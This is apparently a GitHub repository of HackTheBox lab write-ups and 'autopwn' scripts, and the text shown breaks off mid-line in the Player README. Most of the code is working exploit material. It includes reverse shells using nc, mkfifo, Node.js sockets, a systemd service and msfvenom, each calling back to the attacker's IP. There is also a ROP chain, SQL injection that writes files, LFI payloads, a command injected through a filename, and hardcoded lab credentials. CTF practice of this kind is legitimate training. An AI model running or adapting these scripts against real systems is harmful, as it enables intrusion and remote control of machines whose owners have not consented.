├── Boxes ├── AI │ ├── AI.pdf │ └── README.md ├── Bastion │ └── README.md ├── Chainsaw │ └── autopwn.py ├── Chaos │ └── README.md ├── Ellingson │ ├── README.md │ └── rop.py ├── Friendzone │ └── README.md ├── Ghoul │ └── README.md ├── Haystack │ ├── README.md │ └── autopwn.py ├── Jarvis │ └── autopwn.py ├── Kryptos │ ├── README.md │ ├── kryptos.py │ ├── root-exploit.py │ ├── seed.py │ ├── server.py │ └── vimcrypt.py ├── Networked │ ├── README.md │ └── autopwn.py ├── Onetwoseven │ └── README.md ├── Player │ ├── Player.pdf │ └── README.md ├── README.md ├── Safe │ ├── README.md │ └── rop.py ├── Sizzle │ └── README.md └── Writeup │ └── README.md ├── Enumeration ├── .gitkeep ├── README.md └── wakeup.py ├── File Inclusion ├── README.md ├── action.png ├── fmf.py └── usage.png └── README.md /Boxes/AI/AI.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrR3boot/HackTheBox/87c2a87d584c93851dc1d8f5e61d895001a22214/Boxes/AI/AI.pdf -------------------------------------------------------------------------------- /Boxes/AI/README.md: -------------------------------------------------------------------------------- 1 | I really loved this https://www.youtube.com/watch?v=KwzxojwpPqI and designed `AI` with similar concept. 2 | -------------------------------------------------------------------------------- /Boxes/Bastion/README.md: -------------------------------------------------------------------------------- 1 | Simple windows machine involves mounting vhd files and taking user along the way. Privilege escalation is fun with mRemoteng software abuse. 2 | 3 | I've created a walkthrough in Youtube. Here's the link. 
https://www.youtube.com/watch?v=wVeYuyxkWUg&t=1s 4 | -------------------------------------------------------------------------------- /Boxes/Chainsaw/autopwn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import json 4 | import pexpect 5 | import random 6 | from web3 import Web3 7 | from pwn import * 8 | import subprocess 9 | from time import sleep 10 | import netifaces as ni 11 | from ftplib import FTP 12 | from base64 import b64decode 13 | 14 | ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] 15 | 16 | def shell(user): 17 | if user == 'administrator': 18 | log.info('Downloading files from FTP server') 19 | ftp = FTP('10.10.10.142') 20 | ftp.login('anonymous','wow') 21 | files = ftp.nlst() 22 | for file in files: 23 | ftp.retrbinary("RETR " + file ,open(file, 'wb').write) 24 | p = subprocess.Popen(['which','jq'],stdout=subprocess.PIPE,stderr=subprocess.PIPE) 25 | stdout,stderr = p.communicate() 26 | p = subprocess.Popen(['cat WeaponizedPing.json | jq .abi'],shell=True,stdout=subprocess.PIPE, stderr=subprocess.PIPE) 27 | stdout,stderr = p.communicate() 28 | log.info('Loading abi from WeaponizedPing.json') 29 | abi = json.loads(stdout) 30 | web3 = Web3(Web3.HTTPProvider('http://10.10.10.142:9810')) 31 | web3.eth.defaultAccount = web3.eth.accounts[0] 32 | address = open('address.txt','r').read().strip() 33 | contract = web3.eth.contract(address=address,abi=abi) 34 | log.info('Initiating the Transaction') 35 | port = random.randint(0,65535) 36 | l = listen(port) 37 | log.info('Triggering shell') 38 | contract.functions.setDomain('{};rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {}>/tmp/f'.format(ip,ip,port)).transact() 39 | c = l.wait_for_connection() 40 | c.sendline('''/usr/bin/python -c 'import pty;pty.spawn("/bin/bash")' ''') 41 | c.interactive() 42 | else: 43 | key='''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''' 44 | subprocess.Popen(['echo -n {} | base64 -d > 
bobby.key'.format(key)],shell=True) 45 | subprocess.Popen(['chmod 400 bobby.key'],shell=True) 46 | p = pexpect.spawn("ssh -i bobby.key bobby@10.10.10.142") 47 | p.expect(':') 48 | p.sendline('jackychain') 49 | if user == 'bobby': 50 | p.interact() 51 | else: 52 | p.sendline(''' echo '#!/bin/sh'>sudo ''') 53 | p.sendline(''' echo '/bin/sh' >> sudo ''') 54 | p.sendline('chmod +x sudo') 55 | p.sendline('export PATH=.:$PATH') 56 | p.sendline('/home/bobby/projects/ChainsawClub/ChainsawClub') 57 | p.sendline(''' /usr/bin/python -c 'import pty;pty.spawn("/bin/bash")' ''') 58 | p.interact() 59 | 60 | if __name__=="__main__": 61 | print(''' 62 | .-----. 63 | /::::::|^^^^^^^^^^^^^^^^^^^^^^^^^. 64 | |():::::| . . . . . . . . .} 65 | \::::::| .' 66 | '-----'^^^^^^^^^^^^^^^^^^^^^^^^^ 67 | Let's Chop This Box Down.. 68 | by MrR3boot''') 69 | print('1. administrator') 70 | print('2. bobby') 71 | print('3. root') 72 | input = input('> ').strip() 73 | if input == '1': 74 | shell('administrator') 75 | elif input == '2': 76 | shell('bobby') 77 | else: 78 | shell('root') 79 | -------------------------------------------------------------------------------- /Boxes/Chaos/README.md: -------------------------------------------------------------------------------- 1 | Medium level box which shows pretty CTFish steps to get the user and interesting stored passwords in mozilla files to get the root. 2 | 3 | https://www.youtube.com/watch?v=1g6r7dyAwD4 4 | -------------------------------------------------------------------------------- /Boxes/Ellingson/README.md: -------------------------------------------------------------------------------- 1 | Hard machine which involves exploiting Werkzeug debugger console enabled on web application and further privilege escalation by exploiting the binary. 
2 | 3 | https://www.youtube.com/watch?v=ju6f_4ghzo0&t=2409s 4 | -------------------------------------------------------------------------------- /Boxes/Ellingson/rop.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import sys 3 | 4 | #p = process("/root/Desktop/htb/boxes/ellingson/garbage") 5 | remoteshell = ssh('margo','10.10.10.139',22,'iamgod$08') 6 | p = remoteshell.process("/usr/bin/garbage") 7 | 8 | #0x000000000040179b : pop rdi ; ret 9 | pop_rdi = p64(0x40179b) 10 | got_plt = p64(0x404028) 11 | put_plt = p64(0x401050) 12 | main = p64(0x401619) 13 | 14 | #Stage 1: Leak 15 | payload = "A"*136 + pop_rdi + got_plt + put_plt + main 16 | p.sendline(payload) 17 | temp = p.recvuntil('\x7f') 18 | temp = temp.split('\n')[2] 19 | leakedputs = u64(temp+'\x00\x00') 20 | print '[+] leakedputs : {}'.format(leakedputs) 21 | 22 | #Stage 2: finding offsets 23 | #libc = 0x71910 24 | libc = 0x809c0 25 | libc_addr = leakedputs - libc 26 | print '[+] libc@glibc : {}'.format(libc_addr) 27 | #system = p64(0x449c0 + libc_addr) 28 | system = p64(libc_addr + 0x4f440) 29 | #sh = p64(0x181519 + libc_addr) 30 | sh = p64(libc_addr + 0x1b3e9a) 31 | #stage 3: setuid 32 | #setuid=p64(libc_addr + 0xc7500) 33 | setuid = p64(libc_addr + 0xe5970) 34 | auth = p64(0x401513) 35 | payload = "A"*136 + pop_rdi + p64(0x0)+ setuid + auth 36 | p.sendline(payload) 37 | 38 | #Stage 4: popping shell 39 | #payload = "A"*136 + pop_rdi + sh + system 40 | payload = "A"*136 + p64(0x4f2c5+libc_addr) 41 | p.sendline(payload) 42 | p.interactive() 43 | -------------------------------------------------------------------------------- /Boxes/Friendzone/README.md: -------------------------------------------------------------------------------- 1 | Easy machine which includes LFI and SMB enumeration way to user and python library overwrite to root 2 | 3 | https://www.youtube.com/watch?v=UFuDfaXId9U&t=10s 4 | 
-------------------------------------------------------------------------------- /Boxes/Ghoul/README.md: -------------------------------------------------------------------------------- 1 | Insane creation from MinatoTW and egre55. I loved every step of vulnerability which they choosen. I've recorded the walkthrough and here's the link 2 | 3 | https://www.youtube.com/watch?v=Svvo76oaAPs 4 | -------------------------------------------------------------------------------- /Boxes/Haystack/README.md: -------------------------------------------------------------------------------- 1 | Super cool box involving Elastic Search, Kibana and Logstash techniques to get the root shell. 2 | 3 | https://youtu.be/92TSKD81L7Y 4 | -------------------------------------------------------------------------------- /Boxes/Haystack/autopwn.py: -------------------------------------------------------------------------------- 1 | import re 2 | import urllib 3 | import base64 4 | import subprocess 5 | from pwn import * 6 | from time import sleep 7 | import netifaces as ni 8 | from threading import Thread 9 | 10 | ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] 11 | 12 | def shell(user): 13 | if user == "security": 14 | p = ssh(host='10.10.10.115',user='security',password='spanish.is.key') 15 | p = p.process("/bin/bash") 16 | p.interactive() 17 | else: 18 | p = ssh(host='10.10.10.115',user='security',password='spanish.is.key') 19 | p = p.process("/bin/bash") 20 | payload = """ (function(){\r\n var net = require(\\"net\\"),\r\n cp = require(\\"child_process\\"),\r\n sh = cp.spawn(\\"/bin/sh\\", []);\r\n var client = new net.Socket();\r\n client.connect(1337, \\"ipaddress\\", function(){\r\n client.pipe(sh.stdin);\r\n sh.stdout.pipe(client);\r\n sh.stderr.pipe(client);\r\n });\r\n return /a/;\r\n})();""" 21 | payload = re.sub('ipaddress',"{}".format(ip),payload) 22 | p.sendline(' python -c "open(\'/tmp/new.js\',\'wb\').write(\'\'\'{}\'\'\')"'.format(payload)) 23 | log.info('Sending payload') 
24 | l = listen('1337') 25 | log.info('Sending payload') 26 | p.sendline('curl "http://127.0.0.1:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/new.js"&') 27 | log.info('payload sent') 28 | c = l.wait_for_connection() 29 | if user == "kibana": 30 | log.info('Popping Kibana Shell') 31 | c.interactive() 32 | else: 33 | log.info('Writing reverse shell') 34 | q = subprocess.Popen(['/usr/bin/msfvenom','-p','linux/x64/shell_reverse_tcp','LHOST={}'.format(ip),'LPORT=1234','-f','elf'],stdout=subprocess.PIPE,stderr=subprocess.PIPE) 35 | stdout,stderr = q.communicate() 36 | c.sendline(''' echo '{}' > /tmp/1 '''.format(base64.b64encode(stdout))) 37 | c.sendline('cat /tmp/1 | base64 -d > /tmp/shell') 38 | c.sendline('chmod +x /tmp/shell') 39 | log.info('Writing grok pattern') 40 | c.sendline('echo "Ejecutar comando : /tmp/shell">/opt/kibana/logstash_1337') 41 | c.sendline('chmod +x /opt/kibana/logstash_1337') 42 | m = listen('1234').wait_for_connection() 43 | log.info('Popping root shell') 44 | m.interactive() 45 | if __name__=="__main__": 46 | print ''' _ _ _ _ ___ _ _ 47 | | || | __ _ | || | / __| | |_ __ _ __ | |__ 48 | | __ | / _` | \_, | \__ \ | _| / _` | / _| | / / 49 | |_||_| \__,_| _|__/ |___/ _\__| \__,_| \__|_ |_\_\ 50 | _|"""""|_|"""""|_| """"|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 51 | "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 52 | By MrR3boot\n''' 53 | print 'Choose an option :)' 54 | print '1. security' 55 | print '2. kibana' 56 | print '3. 
root' 57 | input = raw_input('> ').strip() 58 | if input == '1': 59 | shell('security') 60 | elif input == '2': 61 | shell('kibana') 62 | else: 63 | shell('root') 64 | -------------------------------------------------------------------------------- /Boxes/Jarvis/autopwn.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import os 3 | import sys 4 | import requests 5 | import random 6 | from pwn import * 7 | import netifaces as ni 8 | from threading import Thread 9 | 10 | ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] 11 | url = 'http://10.10.10.143' 12 | r = requests.get(url) 13 | cookie = r.headers['Set-Cookie'].split(';')[0].split('=')[1] 14 | cookie = dict(PHPSESSID=cookie) 15 | fname = random.randint(1,100001) 16 | 17 | def limited(): 18 | payload = '''room.php?cod=-2 union select 1,2,3,'',5,6,7 into outfile '/var/www/html/{}.php' '''.format(ip,str(fname)) 19 | r = requests.get(url+'/'+payload, cookies=cookie) 20 | log.info('Got the www-data shell') 21 | r = requests.get(url+'/'+str(fname)+'.php') 22 | 23 | def listener(interactive,port): 24 | if interactive=='payload': 25 | l=listen(port) 26 | c = l.wait_for_connection() 27 | log.info('Escalating....') 28 | l.sendline('echo "nc -e /bin/sh {} 123" > /tmp/{}.sh'.format(ip,str(fname))) 29 | l.sendline('sudo -u pepper /var/www/Admin-Utilities/simpler.py -p') 30 | l.recvuntil("Enter an IP:") 31 | log.info('Got the pepper shell') 32 | l.sendline("$(/bin/sh /tmp/{}.sh)".format(str(fname))) 33 | elif interactive=='root': 34 | l = listen(port) 35 | c = l.wait_for_connection() 36 | log.info('Found setuid binary : /bin/systemctl') 37 | log.info('Generating SSH Keys') 38 | os.system('yes y | ssh-keygen -t rsa -b 4096 -C "email@email.com" -m PEM -N "" -f /root/.ssh/id_rsa') 39 | log.info('Writing to authorized_keys') 40 | with open('/root/.ssh/id_rsa.pub') as f: 41 | content = f.read() 42 | f.close() 43 | l.sendline('mkdir /home/pepper/.ssh') 44 | 
l.sendline('chmod 700 /home/pepper/.ssh') 45 | print content.strip() 46 | l.sendline('echo "{}" > /home/pepper/.ssh/authorized_keys'.format(content.strip())) 47 | l.close() 48 | p = ssh(host='10.10.10.143',user='pepper',keyfile='/root/.ssh/id_rsa') 49 | s = p.process("/bin/sh") 50 | s.sendline('cd /tmp') 51 | s.sendline('TF=$(mktemp).service') 52 | payload=""" 53 | echo '[Service] 54 | Type=oneshot 55 | ExecStart=/bin/sh -c "/bin/nc -e /bin/sh {} 1337" 56 | [Install] 57 | WantedBy=multi-user.target' > $TF """.format(ip) 58 | s.sendline(payload) 59 | s.sendline('/bin/systemctl link $TF') 60 | s.sendline('/bin/systemctl enable --now $TF') 61 | else: 62 | l = listen(port) 63 | c = l.wait_for_connection() 64 | l.sendline('id') 65 | l.sendline('''python -c 'import pty;pty.spawn("/bin/bash")' ''') 66 | l.interactive() 67 | 68 | if __name__=="__main__": 69 | print '''\033[01m\033[93m 70 | _ _ 71 | _ | | __ _ _ _ __ __ (_) ___ 72 | | || | / _` | | '_| \ V / | | (_-< 73 | _\__/ \__,_| _|_|_ _\_/_ _|_|_ /__/_ 74 | _|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""| 75 | "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 76 | \033[01m\033[34mBy MrR3boot''' 77 | 78 | print "\033[01m\033[91mLet's Grab the shells" 79 | print "\033[92m1. www-data" 80 | print "2. pepper" 81 | print "3. 
root" 82 | input = input("\033[95m> ") 83 | if input == 1: 84 | t1 = Thread(target=limited) 85 | log.info('[+] Creating Listener') 86 | t2 = Thread(target=listener,args=('interactive','1234',)) 87 | t2.start() 88 | log.info('[+] Exploiting SQLi') 89 | t1.start() 90 | elif input == 2: 91 | t1 = Thread(target=limited) 92 | t2 = Thread(target=listener,args=('payload','1234',)) 93 | t3 = Thread(target=listener,args=('interactive','123',)) 94 | t2.start() 95 | t1.start() 96 | t3.start() 97 | elif input == 3: 98 | t1 = Thread(target=limited) 99 | t2 = Thread(target=listener,args=('payload','1234',)) 100 | t3 = Thread(target=listener,args=('root','123',)) 101 | t4 = Thread(target=listener,args=('interactive','1337',)) 102 | t2.start() 103 | t1.start() 104 | t4.start() 105 | t3.start() 106 | else: 107 | sys.exit(0) 108 | -------------------------------------------------------------------------------- /Boxes/Kryptos/README.md: -------------------------------------------------------------------------------- 1 | # Kryptos: 2 | 3 | ## Description: 4 | A very hard and awesome machine which involves several cryptography concepts where i'm mostly interested in. 5 | 6 | ## Walkthrough: 7 | ### User: 8 | 1. Simple Web login which has hidden ``db`` param and by poking it with certain special characters i ended up in finding a ``PDO Exception`` with ``;`` character. 9 | 2. Which shows that i can redirect target server to authenticate to my own MySQL server and can bypass authentication by creating same table and with any username/password combo. 10 | 3. We welcomed with a page which fetches remote url content and encrypts with ``AES-CBC or RC4``. 11 | 4. As we know ``RC4`` is a Stream Cipher with known vulnerabilities. So i've choosen it for fetching local files. 12 | 13 | > As an example i've sent my local ip to fetch ``A sample text`` and it does returned with encrypted content. 14 | 15 | > ``A (A Sample Text) XOR B (Key on server) = C (Cipher Text)``. 
16 | 17 | > To get the plaintext back we can simply send the Cipher Text (C) to the server, which XORs it with the Key (B) and gives the plaintext (A) back to us. 18 | 19 | 5. Using this technique I started fetching the content of the ``dev`` folder's default file ``index.php``. 20 | 6. It has a ``?page=`` parameter, which immediately suggests a Local File Inclusion vulnerability. So using a PHP wrapper I read the ``todo`` page source, which mentioned ``sqlitestpage``; reading its source I identified a SQL injection that allows writing/reading files on the server. I've automated all of the above steps in [kryptos.py](https://github.com/MrR3boot/HackTheBox/blob/master/Boxes/Kryptos/kryptos.py). 21 | 7. I could see old credentials and a new ``creds.txt`` in the user's home folder. But the new credentials are encrypted with VimCrypt, which uses the Blowfish algorithm. It has a known weakness with which we can perform a ``Known Plaintext Attack`` [https://dgl.cx/2014/10/vim-blowfish]. 22 | 8. Using the script [vimcrypt.py](https://github.com/MrR3boot/HackTheBox/blob/master/Boxes/Kryptos/vimcrypt.py) I decrypted the credentials and SSHed in. 23 | 24 | ### Root: 25 | 1. In the user's home I found [server.py](https://github.com/MrR3boot/HackTheBox/blob/master/Boxes/Kryptos/server.py) and just by looking at the ``eval`` usage I figured out there is a way to execute our code on the server as root. 26 | 2. There is signature validation of the expression that is being evaluated. But the problem is that when we generate seeds they repeat after several iterations, which is an issue. So I generated seeds and kept them in a file using [seed.py](https://github.com/MrR3boot/HackTheBox/blob/master/Boxes/Kryptos/seed.py). 27 | 3. Crafted a script to create signatures from the generated seeds and brute-force the server with the sample expression ``3+3`` [root-exploit.py](https://github.com/MrR3boot/HackTheBox/blob/master/Boxes/Kryptos/root-exploit.py). 28 | 4. After several iterations I see a success message with the evaluated expression. 
Then using known python sandbox bypasses i've crafted a working payload to read root.txt 29 | 30 | ## References: 31 | 1. https://crypto.stackexchange.com/questions/45021/rc4-finding-key-if-we-know-plain-text-and-ciphertext 32 | 2. https://dgl.cx/2014/10/vim-blowfish 33 | 3. https://romailler.ch/2017/11/17/ynot17-sms/ 34 | 4. https://wapiflapi.github.io/2013/04/22/plaidctf-pyjail-story-of-pythons-escape 35 | -------------------------------------------------------------------------------- /Boxes/Kryptos/kryptos.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import urllib 3 | import random 4 | from bs4 import BeautifulSoup 5 | from time import sleep 6 | import netifaces as ni 7 | from base64 import b64decode 8 | 9 | url = 'http://10.10.10.129' 10 | ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] 11 | r = requests.get(url) 12 | cookie = r.headers['Set-Cookie'].split(';')[0].split('=')[1] 13 | token = BeautifulSoup(r.text,'lxml') 14 | token = token.find('input',{'name':'token'})['value'] 15 | 16 | def req(): 17 | payload = raw_input('File> ') 18 | payload = '''http://127.0.0.1/dev/index.php?view=php://filter/convert.base64-encode/resource={}'''.format(payload) 19 | dump(payload) 20 | 21 | def dump(payload): 22 | r = requests.post(url,data={'username':'admin','password':'admin','db':'cryptor;host={}'.format(ip),'token':token,'login':' '}, cookies={'PHPSESSID':cookie}, proxies={'http':'http://127.0.0.1:8080'}) 23 | r = requests.get(url+'/encrypt.php?cipher=RC4&url={}'.format(payload),cookies={'PHPSESSID':cookie},proxies={'http':'http://127.0.0.1:8080'}) 24 | msg = BeautifulSoup(r.text,'lxml') 25 | msg = msg.find('textarea',{'name':'textarea'}).text 26 | msg = b64decode(msg) 27 | with open('output.txt','w') as f: 28 | f.write(msg) 29 | f.close() 30 | r = requests.get(url+'/encrypt.php?cipher=RC4&url=http://{}/output.txt'.format(ip),cookies={'PHPSESSID':cookie},proxies={'http':'http://127.0.0.1:8080'}) 31 | 
msg = BeautifulSoup(r.text,'lxml') 32 | msg = msg.find('textarea',{'name':'textarea'}).text 33 | msg = b64decode(msg) 34 | out = BeautifulSoup(msg,'lxml') 35 | if out.find('div'): 36 | out = out.find('div') 37 | out = out.next_sibling 38 | print b64decode(out) 39 | else: 40 | print msg 41 | 42 | def file(): 43 | payload = raw_input('Filename: ') 44 | file = random.randint(1,10000) 45 | # payload = urllib.quote_plus('''attach database 'd9e28afcf0b274a5e0542abb67db0784/{}.php' as test;create table test.testing(data text);insert into test.testing values('');-- '''.format(file,payload)) 46 | payload = urllib.quote_plus('''attach database 'd9e28afcf0b274a5e0542abb67db0784/{}.php' as test;create table test.testing(data text);insert into test.testing values('');-- '''.format(file,payload)) 47 | payload = urllib.quote_plus('''http://127.0.0.1/dev/sqlite_test_page.php?no_results=1&bookid=1;{}'''.format(payload)) 48 | print payload 49 | dump(payload) 50 | sleep(4) 51 | payload = '''http://127.0.0.1/dev/d9e28afcf0b274a5e0542abb67db0784/{}.php'''.format(file) 52 | dump(payload) 53 | 54 | def dir(): 55 | payload = raw_input('Dir: ') 56 | file = random.randint(1,10000) 57 | payload = urllib.quote_plus('''attach database 'd9e28afcf0b274a5e0542abb67db0784/{}.php' as test;create table test.testing(data text);insert into test.testing values('');-- '''.format(file,payload)) 58 | payload = urllib.quote_plus('''http://127.0.0.1/dev/sqlite_test_page.php?no_results=1&bookid=1;{}'''.format(payload)) 59 | print payload 60 | dump(payload) 61 | sleep(4) 62 | payload = '''http://127.0.0.1/dev/d9e28afcf0b274a5e0542abb67db0784/{}.php'''.format(file) 63 | dump(payload) 64 | 65 | 66 | 67 | if __name__=="__main__": 68 | print "Kryptos..." 69 | print "1. View Source" 70 | print "2. File access" 71 | print "3. 
Dir" 72 | input = raw_input('> ').strip() 73 | if input == "1": 74 | req() 75 | elif input == "2": 76 | file() 77 | else: 78 | dir() 79 | -------------------------------------------------------------------------------- /Boxes/Kryptos/root-exploit.py: -------------------------------------------------------------------------------- 1 | import random 2 | import json 3 | import hashlib 4 | import binascii 5 | import requests 6 | from ecdsa import VerifyingKey, SigningKey, NIST384p 7 | 8 | 9 | url = 'http://127.0.0.1:81/eval' 10 | 11 | with open('out.txt','r') as f: 12 | for i,line in enumerate(f,start=1): 13 | try: 14 | line = line.replace('\n','') 15 | line = int(line)+1 16 | expr = '''3+3''' 17 | sk = SigningKey.from_secret_exponent(line, curve=NIST384p) 18 | sign = binascii.hexlify(sk.sign(str.encode(expr))) 19 | data = {'expr':expr,'sig':str.decode(sign)} 20 | headers = {'Content-Type': 'application/json'} 21 | r = requests.post(url,data=json.dumps(data),headers=headers) 22 | if not 'Bad signature' in r.text: 23 | print "Sign : {}".format(sign) 24 | print r.text 25 | break 26 | else: 27 | print '{} retrying..'.format(i) 28 | print r.text 29 | continue 30 | except: 31 | print 'int error' 32 | continue 33 | -------------------------------------------------------------------------------- /Boxes/Kryptos/seed.py: -------------------------------------------------------------------------------- 1 | import random 2 | import json 3 | import hashlib 4 | import binascii 5 | from ecdsa import VerifyingKey, SigningKey, NIST384p 6 | from bottle import route, run, request, debug 7 | from bottle import hook 8 | from bottle import response as resp 9 | 10 | 11 | def secure_rng(seed): 12 | # Taken from the internet - probably secure 13 | p = 2147483647 14 | g = 2255412 15 | 16 | keyLength = 32 17 | ret = 0 18 | ths = round((p-1)/2) 19 | for i in range(keyLength*8): 20 | seed = pow(g,seed,p) 21 | if seed > ths: 22 | ret += 2**i 23 | return ret 24 | 25 | # Set up the keys 26 | with 
open('out.txt','a') as f: 27 | for _ in range(20000): 28 | seed = random.getrandbits(128) 29 | rand = secure_rng(seed) 30 | f.write(str(rand)+'\n') 31 | f.close() 32 | -------------------------------------------------------------------------------- /Boxes/Kryptos/server.py: -------------------------------------------------------------------------------- 1 | import random 2 | import json 3 | import hashlib 4 | import binascii 5 | from ecdsa import VerifyingKey, SigningKey, NIST384p 6 | from bottle import route, run, request, debug 7 | from bottle import hook 8 | from bottle import response as resp 9 | 10 | 11 | def secure_rng(seed): 12 | # Taken from the internet - probably secure 13 | p = 2147483647 14 | g = 2255412 15 | 16 | keyLength = 32 17 | ret = 0 18 | ths = round((p-1)/2) 19 | for i in range(keyLength*8): 20 | seed = pow(g,seed,p) 21 | if seed > ths: 22 | ret += 2**i 23 | return ret 24 | 25 | # Set up the keys 26 | seed = random.getrandbits(128) 27 | rand = secure_rng(seed) + 1 28 | sk = SigningKey.from_secret_exponent(rand, curve=NIST384p) 29 | vk = sk.get_verifying_key() 30 | 31 | def verify(msg, sig): 32 | try: 33 | return vk.verify(binascii.unhexlify(sig), msg) 34 | except: 35 | return False 36 | 37 | def sign(msg): 38 | return binascii.hexlify(sk.sign(msg)) 39 | 40 | @route('/', method='GET') 41 | def web_root(): 42 | response = {'response': 43 | { 44 | 'Application': 'Kryptos Test Web Server', 45 | 'Status': 'running' 46 | } 47 | } 48 | return json.dumps(response, sort_keys=True, indent=2) 49 | 50 | @route('/eval', method='POST') 51 | def evaluate(): 52 | try: 53 | req_data = request.json 54 | expr = req_data['expr'] 55 | sig = req_data['sig'] 56 | # Only signed expressions will be evaluated 57 | if not verify(str.encode(expr), str.encode(sig)): 58 | return "Bad signature" 59 | result = eval(expr, {'__builtins__':None}) # Builtins are removed, this should be pretty safe 60 | response = {'response': 61 | { 62 | 'Expression': expr, 63 | 'Result': 
str(result) 64 | } 65 | } 66 | return json.dumps(response, sort_keys=True, indent=2) 67 | except: 68 | return "Error" 69 | 70 | # Generate a sample expression and signature for debugging purposes 71 | @route('/debug', method='GET') 72 | def debug(): 73 | expr = '2+2' 74 | sig = sign(str.encode(expr)) 75 | response = {'response': 76 | { 77 | 'Expression': expr, 78 | 'Signature': sig.decode() 79 | } 80 | } 81 | return json.dumps(response, sort_keys=True, indent=2) 82 | 83 | run(host='127.0.0.1', port=81, reloader=True) 84 | -------------------------------------------------------------------------------- /Boxes/Kryptos/vimcrypt.py: -------------------------------------------------------------------------------- 1 | with open('creds.txt','rb') as f: 2 | f.seek(28) 3 | a = bytearray('rijndael') 4 | b = bytearray(f.read(8)) 5 | c = bytearray(len(a)) 6 | for i in range(len(a)): 7 | c[i] = a[i] ^ b[i] 8 | #1st block 9 | a = bytearray(len(a)) 10 | for i in range(len(a)): 11 | a[i] = c[i] ^ b[i] 12 | print a 13 | #2nd block 14 | b = bytearray(f.read(8)) 15 | a = bytearray(len(a)) 16 | for i in range(len(a)): 17 | a[i] = c[i] ^ b[i] 18 | print a 19 | 20 | #3rd block 21 | b = bytearray(f.read(8)) 22 | a = bytearray(len(a)) 23 | for i in range(0,len(a)): 24 | a[i] = c[i] ^ b[i] 25 | print a 26 | 27 | #4th block 28 | b = bytearray(f.read(8)) 29 | a = bytearray(len(a)) 30 | for i in range(len(a)): 31 | a[i] = c[i] ^ b[i] 32 | print a 33 | -------------------------------------------------------------------------------- /Boxes/Networked/README.md: -------------------------------------------------------------------------------- 1 | Easy box having apache misconfiguration while handling the files on the server and command execution vulnerability in network scripts. 2 | 3 | 4 | References: 5 | ------------ 6 | 1. https://blog.remirepo.net/post/2013/01/13/PHP-and-Apache-SetHandler-vs-AddHandler 7 | 2. 
https://www.nds.ruhr-uni-bochum.de/media/attachments/files/2012/11/File-in-the-hole.pdf 8 | 3. https://seclists.org/fulldisclosure/2019/Apr/24 9 | -------------------------------------------------------------------------------- /Boxes/Networked/autopwn.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | from pwn import * 4 | import requests 5 | import subprocess 6 | import netifaces as ni 7 | 8 | ip = ni.ifaddresses('tun0')[ni.AF_INET][0]['addr'] 9 | 10 | 11 | 12 | def shell(user): 13 | data="-----------------------------169128251116063042041106433445\r\nContent-Disposition: form-data; name=\"myFile\"; filename=\"test.php.png\"\r\nContent-Type: image/png\r\n\r\nGIF87a;\r\n-----------------------------169128251116063042041106433445\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\ngo!\r\n-----------------------------169128251116063042041106433445--\r\n".format(ip) 14 | r = requests.post('http://10.10.10.146/upload.php',data=data,proxies={'http':'http://127.0.0.1:8080'},headers={'Content-Type':'multipart/form-data;boundary=---------------------------169128251116063042041106433445'}) 15 | log.info('Triggering Shell') 16 | l = listen(1337) 17 | image=ip.replace('.','_')+'.php.png' 18 | subprocess.Popen(['/bin/curl','http://10.10.10.146/uploads/{}'.format(image)],stdout=subprocess.PIPE,stderr=subprocess.PIPE) 19 | l.wait_for_connection() 20 | log.info("Got www-data shell") 21 | if user=="www-data": 22 | l.sendline("/usr/bin/python -c 'import pty;pty.spawn(\"/bin/bash\")'") 23 | l.interactive() 24 | else: 25 | l.sendline("cd /var/www/html/uploads && touch -- ';nc -c bash {} 1234'".format(ip)) 26 | p = listen(1234).wait_for_connection() 27 | log.info("Got guly shell") 28 | p.sendline("/usr/bin/python -c 'import pty;pty.spawn(\"/bin/bash\")'") 29 | if user=="guly": 30 | p.interactive() 31 | else: 32 | p.sendline("sudo -u root /usr/local/sbin/changename.sh") 33 | p.recvline() 34 | p.sendline("a 
bash") 35 | p.recvline() 36 | p.sendline("c") 37 | p.recvline() 38 | p.sendline("d") 39 | p.recvline() 40 | p.sendline("d") 41 | p.sendline("/usr/bin/python -c 'import pty;pty.spawn(\"/bin/bash\")'") 42 | p.interactive() 43 | 44 | if __name__=="__main__": 45 | print ''' .----. 46 | .---------. | == | 47 | |.-"""""-.| |----| 48 | || || | == | 49 | || || |----| 50 | |'-.....-'| |::::| 51 | `"")---(""` |___.| 52 | /:::::::::::\ _ 53 | /:::=======:::\ `\`\ 54 | 55 | `---------------` '-' 56 | Networked by MrR3boot''' 57 | print "1. www-data" 58 | print "2. guly" 59 | print "3. root" 60 | input = raw_input("> ").strip() 61 | if input == "1": 62 | shell('www-data') 63 | elif input == "2": 64 | shell("guly") 65 | else: 66 | shell("root") 67 | -------------------------------------------------------------------------------- /Boxes/Onetwoseven/README.md: -------------------------------------------------------------------------------- 1 | Breaking SFTP and getting access to hidden user on 127.0.0.1 and tunnelling to access admin panel on local port further escalating to root using APT MITM injection. 2 | 3 | https://youtu.be/RN_mTtLPzFE 4 | -------------------------------------------------------------------------------- /Boxes/Player/Player.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/MrR3boot/HackTheBox/87c2a87d584c93851dc1d8f5e61d895001a22214/Boxes/Player/Player.pdf -------------------------------------------------------------------------------- /Boxes/Player/README.md: -------------------------------------------------------------------------------- 1 | 1. Intended way : https://www.youtube.com/watch?v=rT5KnuwAFPQ 2 | 2. Unintended : 